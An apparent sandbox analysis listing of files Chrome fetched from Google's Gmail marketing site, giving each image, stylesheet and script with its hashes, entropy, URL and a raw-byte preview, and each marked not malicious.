                                                                                                                                                                                                                                                                                          Preview:import"./vQ8El_Rl.min.js";import"./IniIGeRU.min.js";import"./bS7WqXuL.min.js";import{l as P}from"./_OAi-NRQ.min.js";import{d as C,i as p}from"./HxYQzxVf.min.js";import{c as m}from"./zRFBfJZH.min.js";import{r as S,x as l,A as L,s as W}from"./ycaG4YXp.min.js";import{l as T,e as $}from"./0XPwTFcg.min.js";import{n as o}from"./IYoTYjYE.min.js";import{t as h}from"./ianzD0dL.min.js";import{e as y}from"./p9kcPq91.min.js";import{i as x}from"./IFunn9hk.min.js";import{o as g}from"./5Ss99t85.min.js";import{o as _}from"./RpI-OtYr.min.js";import{R as A}from"./bAPu5B1A.min.js";import"./44SUZn7a.min.js";import"./rwBjrn-0.min.js";import"./lHimDk5Y.min.js";const z=':host{--bds-carousel-scrollbar-height: 30px;--bds-carousel-scrollbar-track-height: 2px;position:relative}bds-pagination::part(pagination-item){cursor:pointer}.feather .left-feather,.feather .right-feather{--feather-width: 20vw ;position:absolute;top:0;height:100%;width:var(--feather-width);z-index:10;display:none}@media (min-width: 3000px){.f
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):10341
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.971936202585003
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:XfkacKn221yb09Ga5N9bcsOOqlG4fSmMpVFCIN2zhKyQS6+JGZeBaZH:Xhd2xoV5/bzqlNfS56/Xv8eM5
                                                                                                                                                                                                                                                                                          MD5:E639FEDFEB77DCBC4A25E6AA7116353A
                                                                                                                                                                                                                                                                                          SHA1:96FC2BD806BF9B04D652EA329762967CC405076C
                                                                                                                                                                                                                                                                                          SHA-256:DF79FDAEADC0FA5E3FF483649B9FB45B607EE4E54EE79405B90A39BB0F80E020
                                                                                                                                                                                                                                                                                          SHA-512:908BA29C49F68E8DB7090B03107E08A4C1002A9586F1BEDAF41EC8C72E0A9E01622DF4E495BA673E6B388D49A12EE7F480183C699C9B8E7FF2274C0BDA93D2DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Ucxl6g9AKLX3XmK7an_99LzivIJsXn5cvQdIMM_g4nNFZdULnGa4TH45WVlFu3vKd_c41R28NdjDzCEWgAwb5wjONbIPR4agLFUO1w=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y.\Gu.n..jf$.$k.$..ly76x.....`.....y@ +<..^.I.K...cI.O.bC.C.Yb..&.xC...$[.e.....}.:.{o/3...3=.........nU..:uj.p.Gq.Gq.Gq.G.r.3....7..d.3.....#.FD.....9E.P..?.m.......#..N.g...^rA6.rp.............RQ...G.......I....,.....&..x.Cb........X..../.=e;..-...3G...\......YG.o.T:A.8.Y#F..)jC..u..V....@.." ..A..x......GDw....tf....^q.....G..m.g....b..,9..9Y...j...(.h.a..j%..Z.w#....1.I..L.....z..6.]...>(.'..x.{:[...yK...Wd.._x....K.t...S.c..E.RL..T....-...oU z.d2...O./........O...O.`~%]\<..~.....KV\."..R.t..x.Ki.......`....o.$.n</./.C...T...S{...KwM5..s....;/. .:n..F.Z....Wb-j.........Br....<...}...1j....y..._j........t.kL:..v.x2.?..F}j+...3.D.....&...$.M........Z{......uW......[(.X..}:.P.......B.8....L>?........Y....o.....#..7......'.Q./.G...6.NM..T..Z2..~`..n....<.s.w]y.1..n..._..:.T...B.#Bp.s%....=X:../..}..g.sxN.~...n*..k;~.1y-.<..9..'.9.w.....7....3..<'....A...../...4".r.Y..<.\...\.s
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6073)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6074
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.176990031764545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:atGHZ2jNl3Ka5IrY8TsCHY4ntNVVYUVY9sTTacxivGZQ9QL39VgLR:iNBKuIRTdtNIrfINVYR
                                                                                                                                                                                                                                                                                          MD5:AFB0340686E17C85E91BA61DD70651AE
                                                                                                                                                                                                                                                                                          SHA1:9ECC90FF0950FA3E08CBF87B0004EEF63038AB9D
                                                                                                                                                                                                                                                                                          SHA-256:EBDBE874A4CD6F5A7562666C85929419F77E5CDEACD83AC81DC04231E15254D8
                                                                                                                                                                                                                                                                                          SHA-512:09BDD12D584E70128F68E590F0A692D5106D689BD64AFC280DCF42C703F478C0BC8D6916B4A0B23CB035A8B4EBBA1948D480B08EEDE81D83BBE659FA8D62F394
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/css/partials/faq.css?fingerprint=afb0340686e17c85e91ba61dd70651ae
                                                                                                                                                                                                                                                                                          Preview:@keyframes summaryOpen{from{opacity:0}to{opacity:1}}.faq{background:#f8f9fa}.faq__grid{margin:0 auto;display:grid}@media(max-width: calc(600px - 1px)){.faq__grid{padding:0 24px;max-width:600px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px)){.faq__grid{padding:0 min(5vw,72px);max-width:600px}}@media(min-width: 1024px)and (max-width: calc(1440px - 1px)){.faq__grid{padding:0 min(5vw,72px)}}@media(min-width: 1440px){.faq__grid{max-width:1600px}}@media(max-width: calc(600px - 1px)){.faq__grid{--grid-column-gap: 24px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px)){.faq__grid{--grid-column-gap: 24px}}@media(min-width: 1024px)and (max-width: calc(1440px - 1px)){.faq__grid{--grid-column-gap: 44px}}@media(min-width: 1440px){.faq__grid{--grid-column-gap: 64px}}@media(max-width: calc(600px - 1px)){.faq__grid{column-gap:24px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px)){.faq__grid{column-gap:24px}}@media(min-width: 1024px)and (max-width: calc(1440px - 1px)){
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2862x1430, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):129780
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992646996790565
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:u+YLR2gvoUj+1jRiPurx8b/qNd+zelc4GhKESC4MyW:u+eRxPWaSNgzw/ESWyW
                                                                                                                                                                                                                                                                                          MD5:F81B4CF6990EBD6E768C7D1C9BC80FEE
                                                                                                                                                                                                                                                                                          SHA1:20D1E393F6EA355794D87BA5D2E4741811F85036
                                                                                                                                                                                                                                                                                          SHA-256:B76FE40458529ED6E97503D275877308B521F563A85636C063D37EF6A904D32A
                                                                                                                                                                                                                                                                                          SHA-512:6DD568E90F577E614E709DF19D4B26BE3E3B2CAF28458B31C454852E31251CEAD8A1C723CFC10F54BC74F184954F95ED24599803D758537977AE0E2063642855
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 ....pz...*....>m6.H.#8."Qi....inP.].W...:g...p..._.o..8k*.o.F)....U.?_rq.......a...?.?h=..0....._.m..|..M.1...+9.@<vz=~....?..O..../.E.;....W'.>.................m....'...........o....>.........xC.g.O_.....SR?..}...........G..X.A}A.o;..~....k.W.......k.......,.t;4C..Q0.e.9........h.<..k$A/.y.;p.................H..*."a.........=g..].$....Z.r..#+..D........"a.eD.....Th...lt._b5yI.'t<.....k...N......,...P.c......'9^..&.[.B~.1E.....y.lX..........B,.[..^3.%...M......_(_.,....B1m....@.u$c.A=.H..vIa.......vU$M~B..%.nj&!.>@.i<......J..%......c&ga+....2..xi.5}A....`b...rk..FRKv.....LN.-.....|(T.S..l.)+.... ..2..I.=.%:H.....<.*o._,..........L...B..I..l..;~.....y.h.9..L=...............K,...K..ZH..YT...t;..#...h.@2...]..CPk."...u.."D..o.I......O...&N6<...b...D..-T..=......f;..V..aX.;.M.R.a...?.......y|...{..H.{._..a.e:..T.B%.Q...x.&..j&F......y\...h0>NA>.~D..I....gz.n.....i../.....d.......T..CVk7<.k$k.!...&V........s.H..[+...s. .\.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2589
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.897517005551768
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:gc6B/DWd+LWNZa5pAKunbUNeFklgrspiDKyl8KyZqkTsVFtpEkhy:uB7bLQNKunIAF4mKyZRyEFdy
                                                                                                                                                                                                                                                                                          MD5:60CBC0D927388FDCCFFCBEDE444BBE31
                                                                                                                                                                                                                                                                                          SHA1:9711037A70336CBDE2695D46EDE582E211D81CBF
                                                                                                                                                                                                                                                                                          SHA-256:42A62B13D9ED82073E22A8752216EDDDE216436C72F2B1E1DEF9A50C0910C8B0
                                                                                                                                                                                                                                                                                          SHA-512:47A37FDBEC16161AD3CF7DBC4780E71AE71B7E08A86BC39833DB1B532A3F5C2E4CB302568ACDCB8337D0E84276A8F912F04904AC6539593BC50BC211E0B610A1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/RwVe2Cm1EjeDmYhdTzr179G0ovq_PCxgPzQ92PO-YxTBEFTHWh0L6Ev8FFDWRgRGrE81vwn95tyg9Ey189OO4kllhhpLAMIsGFZ-UKA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..Ml............9@.G...?B..`C._...#...P)I.CS......RsI#zj...`..J..V..5....8......P..T....{....?vwf.w............;.3...........#.......Z!..~..=|U.....|.-g..).^...|...<H.,.v....p..t~......chp.V. .<...sA>..\...{.r..y&.gb....N..nt....2W.#.rF]...9:.+gi.N.lo.`Z.LD.WGBE....?6-d:"..'.......RD.{C.8t..m.i!....!*:p}S.j.:.&2.[.D...0....fG.oM..Od..(.r..m...@.......mZ.D......m).""..Dt.i...>".ysc.r..".}..N..#.}F`.W..*!2....ho[ejxd..4....... P]gjtdp......... .2S..~.(.M.;.P].....a...F.....t.aE?......]Xbj.o......v!w..4.4..y.h.O.........U.....s5....bh...<UYt.).. .^.............*..ig.H....b6.Z.&....\...;5....g.k|.QSxbp1.x.x.X..z........$B.@7EU.....l|......E.>....e...>.<...\..E'.....4y).\.i.8St..L...l*.."......P....8.N|.i!..(..]...N|....CL..T....aZH..M.....*....&.r..$l...R....>g..x..`9.1.20.$l....+....Y.q....:T.M.."gr....:.^.g..H...s......Y.....Ay=.1>..X6a2..1}...`.W.................zA^.J.O...&....2.3.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 96 x 96, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1651
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.667621565226602
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:3p6uEdAl1D4ZoyRIIYDwFi2mfaJ4nhjK0V6X+N:3kuDWZoyRMr1f+whjZQQ
                                                                                                                                                                                                                                                                                          MD5:0B6D9F3D556E046FA43AD9C31F966968
                                                                                                                                                                                                                                                                                          SHA1:67325397FC4C0434C3EC60CA1A4601271E5BE389
                                                                                                                                                                                                                                                                                          SHA-256:33FBAB52B8F48572CB07BA5A739EB72BC11D8DE1234C5AE8C43584B3F948A0CA
                                                                                                                                                                                                                                                                                          SHA-512:B07FDC7FA7FD06BFD2FA0014891C2CF55C07A292328CB7984ED1396B2F3B874B2080EE9F87F879273BD29E1DD10095AA40944F6EC03FC3CD1902AC88D3D4AD6C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/mjVS_Izc6fGAvuaT0v--gb2so5mZvAbI5EUMUB41cWB7tpy81trBCR8rIlj8NoKgPzDWGN-Hs97NlW0T9W57YJ5z9A8QQWwXUYa_Zg=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...`...`......F.....[PLTE...{..kx.ds.....mz...hu...x....]l....Te................}..CT.?Q.CU.>P.JU.AM.@Q.:N....AO.<J.GQ.>O.@P.;L.:K.>J.cq.bq.bp.ap.`o.`n._n.^m.^l.Wf.Rb.Qa.Pa.P`.O_.N_.M^.M].L].L]....Sc.L\.Te.K\.Sc.JZ....K[....K\......J[....lz.IZ.IY......IZ.Q`....JZ.IY.HW.fq......J[.HY.@O.?L.=L.=L.=K.<J.<J.;I.;J.;J.;J.<K.GW.BQ.?N.?N.>M.=L.=M.=L.=M.GV.AP.@N.AN.@N.@M.?L.?M.>M.HY.GX.BQ.@P.@O.?N.>N.IY.GX.BS.AR.AS.@Q.@P.?O.CS.BS.BR.BQ.AP.AQ.@P.GY.CS.BR.AP.DS.BS.AQ.FX.DT.CR.BQ.FX.BR.FW.ET.DS.GX.DU.CT.BS.AS.DT.CS.BS.FV.CT.BT.FW.EU.DT.CU.EV.DU.EV.CT.DU....DV.DV.DU....CT.BT.AS.AR.@R.@R.BS.?Q.>P.BS.>P.@P.?P.>O.>N.=N.<M./aG....(tRNS.6..h..S.J3K.M.OPOONOWl..-+...../...-P.......IDATx...$E.E...S......z^.........-pw..wmo...U...NOK.9..M)....@..W.P.......q...D|...$y$.3.Md..6...9...1.>.....l.......a7..-s..w..C.....M..#..FE7..w......*.@MQoXh(......."...X.D%.M...M: .W...w,6/.K..X*..._%...R......9......R......4 ......*I;.h..>8P.......c...............e.P.`.*....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4217
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.938524730043499
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nJcxQGmS9OitIp09ec05EOkhS6gGiMSojliNX2:Jcx4+tIGYc0YhS7GiMSoRWG
                                                                                                                                                                                                                                                                                          MD5:44B83718959F1E11C1291D2962C1DAB3
                                                                                                                                                                                                                                                                                          SHA1:5597E8F846BE88066607927E8C3FAB5E95A0C652
                                                                                                                                                                                                                                                                                          SHA-256:DC3789CC4765D5CF2BA76888A40340E4CCAF6916022F3A6DFB27DF045C6FCB5B
                                                                                                                                                                                                                                                                                          SHA-512:8CD7161755EE42104A1518F2177EB1CBAEFE3EFD607AC554AF928E7A902A5F5BB8273C75F274F63003A69CFEBE153A32886C8C73FD6EA9C3D149BD0DC268C6F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{t..}.?wvV+.V...../.&<....8<".H.#..fx..J........i.Lz.3!.8!Ii^..!8)'. ........../#d.[.V.......G..>..T}..9:3s....w..w~..L1..SL1..~ .....-...x.N...q?..I%p....h...:`..!..@/....l...x...A.BV..8..Y...........u$.L...=.......z..8....&p:P.}I..,...kZ/....Xd..T3....t.....W.....T..5...]....#*....8..y&....T.$.....BA.(uG..pM{,..x......t....Gy...y..3.!.........X.-....w.c.m..x...MI...`>.B:.7....0..(...m.<.x.X.O...h.M........\{,.n...%%p...X.e<.kX.#fD.p*...X..M.C...-...[..G.xZ..!.....}..s.S..G[:..~..#....L..5gbC...k.5Y....m.t..Sl)Y..QY.....=...nTb9.|}..n.}....k.))...R[U....._n.E~...X.V....s......7.H....z#..}......Q&|...5.....|n....p-5N..:(9".]....D...k.c..^;..4......e...U..S.......2....;...]......=..=........B.D.H..../...K...!teNSCc.z..q!}...v.i..jj8.xv.vM...nn=......u.}.....H9......T..X.^9..?
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.203749514981059
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:tdLnulpkscLuJGf0nsEGHm/EUyOp/L+coJwQQkRZi//:/2kscLuJGf0nsEGHORNL+bJnRkn
                                                                                                                                                                                                                                                                                          MD5:EE6CF301BE3DB406E50C4BF45FFB7B54
                                                                                                                                                                                                                                                                                          SHA1:4E62B36F5A095D2CA558E65FEEE14FA34672D352
                                                                                                                                                                                                                                                                                          SHA-256:57395E24036A1A8BD8BBB4A9AE57C0589480C1235032CCF02E88382C110F39DA
                                                                                                                                                                                                                                                                                          SHA-512:A320C301F776A518E8C0EBF3DE37CCF999C5987E2BCA2267AFDE2A5AB367972D1654BE2792C211F245550506FC8F3D28A5F714155A199188432516777280622D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/d8/0d/95f0c1154ff2aa6bb167408e2abd/vector-3.svg
                                                                                                                                                                                                                                                                                          Preview:<svg width="34" height="34" viewBox="0 0 34 34" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M17 0.333496C7.80004 0.333496 0.333374 7.80016 0.333374 17.0002C0.333374 26.2002 7.80004 33.6668 17 33.6668C26.2 33.6668 33.6667 26.2002 33.6667 17.0002C33.6667 7.80016 26.2 0.333496 17 0.333496ZM15.3334 30.2168C8.75004 29.4002 3.66671 23.8002 3.66671 17.0002C3.66671 15.9668 3.80004 14.9835 4.01671 14.0168L12 22.0002V23.6668C12 25.5002 13.5 27.0002 15.3334 27.0002V30.2168ZM26.8334 25.9835C26.4 24.6335 25.1667 23.6668 23.6667 23.6668H22V18.6668C22 17.7502 21.25 17.0002 20.3334 17.0002H10.3334V13.6668H13.6667C14.5834 13.6668 15.3334 12.9168 15.3334 12.0002V8.66683H18.6667C20.5 8.66683 22 7.16683 22 5.3335V4.65016C26.8834 6.6335 30.3334 11.4168 30.3334 17.0002C30.3334 20.4668 29 23.6168 26.8334 25.9835Z" fill="#202124"/>.</svg>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x393, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):107565
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.975686549609348
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:szuwrb3dxaLYf2wO7PTnfulHWIGrrwL4W4UBgXJsF/pT5JI9Tu2J1KKeNlYWocq:sTQNLWlHWVS4W4YgXyFRTU997KK025
                                                                                                                                                                                                                                                                                          MD5:70A25E317D38E5F5F53DAE77985AAB28
                                                                                                                                                                                                                                                                                          SHA1:B044DD95D7212EB3715818AC7BA1FD2DB2ECDCEF
                                                                                                                                                                                                                                                                                          SHA-256:258AE61DAEDE0E2BE36C673428CD260EB399D7F812F5A13202B9C491141883CD
                                                                                                                                                                                                                                                                                          SHA-512:A8B1809A408E09EA548B6FC4666BC247C097BF6FF4BCF129F16C030781F545E6B7F6633C497B7F682D5E89EE12870F0B119DAAE566ED0212939DF34CA30E2A97
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/a7/9c/f9eb5ed9400a9efe197085add61a/cover-width-1600-format-webp.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................[.........................!..1."AQa..2q#B....3Rbr....$C..4s....St......%5cu..D...Td....U....................................C.......................!..1AQaq.."...2....B.#Rbr....$3....S%C................?...........o...F..Nh..s...$...,{..94..'_M..A$xt...`..`.>d._...[..iX..hp.t..7.......B>G....m..{.y.a.....?u.o...?u..xxU.R.. ...k.....o..x..k5J..7k..m..]......Xs.<.Y%H.J...2y.(tX... ..A=."....Y.x.n.4r......D.lF..u6.7..iBU...Qr.F.."M(...8...1....PL..@..x.....$.;.`/s....dK...T...P.....Q=..Uo.P.$....RQ2.:..P....P.(.o...,.nN...._...}l..,.S..............2...M.^.....5.W... ..P..'T.(.....@h.....H...v.9I..C3;.v.....x.l.......q.b.RU=,..l.6..So.....o.M\5.T........#..n>D.-.)....o.#:.e-J.u..".....Co....1.~6..?./.q..<..........v.q.G.?./...m......2J5H.(~...G..}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):536872
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.371045993798874
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:abSRSMtHhmSmpwVJZkDCq+mqO74MytJ1KrGzyvRhTAUDEEh9ESFN:abDcBmSlrZg+VMsartvR2c9ES
                                                                                                                                                                                                                                                                                          MD5:497F86082FDD888699E9066E26F5D0F7
                                                                                                                                                                                                                                                                                          SHA1:6FB1DDB8C669837799C58C2E53632DB4252BA27D
                                                                                                                                                                                                                                                                                          SHA-256:88B71E87F8CEF9813E2833FD5071ECBB828860C365BD1E084F665EFE00463143
                                                                                                                                                                                                                                                                                          SHA-512:C66720EACFB28E2F3A0939B3BA6E48E83770169C8C58206D0904558BC4315313A5ED377C9DFD875AB95E8F896A078701BF8D8523985C8DCB78BE1BB71F6CC79F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF 1..WEBPVP8L.1../..D..u!...R.....Y.P....]m.\..H........<..|.....m.i..W.d..)>`[.v.bP.L......:...L.\h..6t..N.....R....9..3.a.t.v)..n..%M. ..!..8...G..B...e.~:~....~..........m{~7qu...[EeI.Hr.L......L.'.&.v.........{..)G.HeJ...I.L.......H2..$Yk......m[.....~...%..X......$.X..Dn.....N........F...{....v.$Of#7Iq.!.Z...K........{..mk..j.o..@.(.Yre.....1.........d.mL........l.n:M.Iz@..G..H...M..Y!f....Sp.dg...~.....=9r..S-...+@.?T....E..).d.V...O....%....{gB.#I...6......Fn.~.@. .F."DA.-X....u(.tJ..s..s..s..qs.9.].*......J.t9.F.y1..@.D.$B..s......gN_....m.......D.R;.s...68Z;....;..../.......ca..8N.(..27.e.......;m.|..9I..*t........2......6w..ASy.Uigu..v.5...............:.....g.2...x.+.!.@..4.......K....w.qz..4K....J]...W...N..y\A..G[9V..'........r..Q.")...!..\...3.'.........z....{...{..+.......s....$..%...G]..;k.#=.[...m........<<tG.CI....c.#.....h$0..1<1K.<.om..M...>.3.%1.....&..o.....)06{...L...-.6G.^....J<...`f...Qr.cf&..I...s9..%hvVKS.`.b
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 358 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):24042
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.98083443633452
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:M+abCjZiwuUQAaCaQPJt/c/6kaL+UjFkif1J4VxHGVdU+rTmwhwY8HTvhEQjWwjf:fIC1ziHBKJqSCMf1J401TmwhL8HbhY7g
                                                                                                                                                                                                                                                                                          MD5:DB2EAD3893798B7E8E6ABE56E569E5EF
                                                                                                                                                                                                                                                                                          SHA1:4A0E4D008BD88F366A3C844C42367647B1AD1EE3
                                                                                                                                                                                                                                                                                          SHA-256:4315EDD72C57C641BE25F6759BACBDE3AD2FEB6EE13134A108C3BBD713B33326
                                                                                                                                                                                                                                                                                          SHA-512:EB87FA4D6BEF99081A31F02DBEF541F4574743D8DDF508530211C97BE8A9E3D2FCEEF5F7DE869BEF387865ECE7C801E08446DDC03DB24ACB45CD2E767A807182
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/p4M1mK1Lbtc2tt54b6JUQUJ5U8RcwHnEAPH7_87X2NH9Rc8N9ek0Xm2BUq_wmLuOWXlylcDlZFOg4xF3aQtwsyF9frOHoqiQdWVpG-v4VO-Jb_4lIQ
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...f..........c......sBIT....|.d... .IDATx...w.]U.....>}f..d..@..H.]jh......{..\..K. H3...XPDAQQ...H(A... H.$.Lz...s.^..3..S&9e..>......9..g......<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<.k..w.....1=[...D*.aS.iD...J..BZq...@..I..I.$...T.A..(....*..HV`..(.^..$..K..E..K.n.j..n.[.O.^M..t....r.....5.A...M.......U..+h..d.q......*..8.B......S.PE..].s+T....O..-.s..?....n...j...{......w..}..p..lDF....cAG.).$..A.r..%Y.l.F.]_........_"...h..E.."y...q"+#.^r..s..?..4.V..<..'f.l....]...S...b.I.....1.1C.N...UJ.. C.. ..ZJ....PfE............r.g..`.N.P.9..x...H..@.P.v..~.Yi.]....{.E.e8^...."~......;R......]..?%a.Q.w. ...zs....O...m.Z]..{..*h..e.O.!...........=m.g.....Et{..D...{..X.X.tn@q..C}"..W........O....;..K..{Dd..N..#.j..Q..9#...Hx<_...WL.~..y..E}..M.v...R.>*.%....kmh.C.....;r+P.kT..3.......-.B.+.\p~..a S......_...(.2..,....h.:U.DE......im..o..._.&.@...?....a......d\...D..&...M..24..,*.w.......a.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1000x565, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):104459
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983105365304557
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:6RZlWT+O0JWlX2TvY2TILWRNXD9t/nUJUCW+VWKaJg80497Al3Yp2tQdXN7xmwOh:6RRJH02oWRNXDSF3aJSNc9N7A0yuZCP
                                                                                                                                                                                                                                                                                          MD5:A136BBF831A04A0215799B18B000981A
                                                                                                                                                                                                                                                                                          SHA1:22D4814299614B91CA5A0972E381CC77C370C9F8
                                                                                                                                                                                                                                                                                          SHA-256:B55EA20AC2CB168EBCD3D92CB0B2530947392EE11952E585DDE815B471546786
                                                                                                                                                                                                                                                                                          SHA-512:0D27EF8D9BC7A48F091E5CC45E4B689A756391235993473EE27413D9C2E1D6FB2F7B61706D0AB39B3F0B8D96A0CACF034DBCF19142A898185E52F549808BD5CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................5....".........................................].........................!..1AQ."aq.2.....#BR..br....$3S......Ccs..4d.....%Dt.....T5E.......................................H.........................!1AQ.."aq..2......#BR..3b..$Cr.....4S...Dc.T%............?..N.W..A.`..uH.p.J.hg.Qx.../8.....}.R...D..,.{9K.......d.5..6DD-.o..Jv2L....Sm..5L-..h.e.Q.?%..pyX.....[1....,D..B(..p.%{.`..1..I.........+.."....+...b..E.8~..I. ..]n..S.........e5.Q.s.'E./j.l...]..9.cnsnO..x.&[1p.....SPenN".jwT..F.G6P.n...!.w.i.ev.=....q.fi.e.[k..w...d.H.8....96...gy.pA...'.=...E.s.z..5...N..4E$...%.......A-MT.B..o}....f....b...i.L[G.Y.L1-...g......r(n........Z...#PlT.h..EVTM..C6.o~.S.l..w.(v.U\.x.../X..N. ...s.....h3......M...N.UEC.!a.. [..../x...j...i.Y..4.d.....6.f#k...Bl...s.d]..p/..h..g#3o.+|3......s*..1..[..<..$Z..*..i..+wl..H^
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7094
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.964645757212399
                                                                                                                                                                                                                                                                                          Encrypted:false
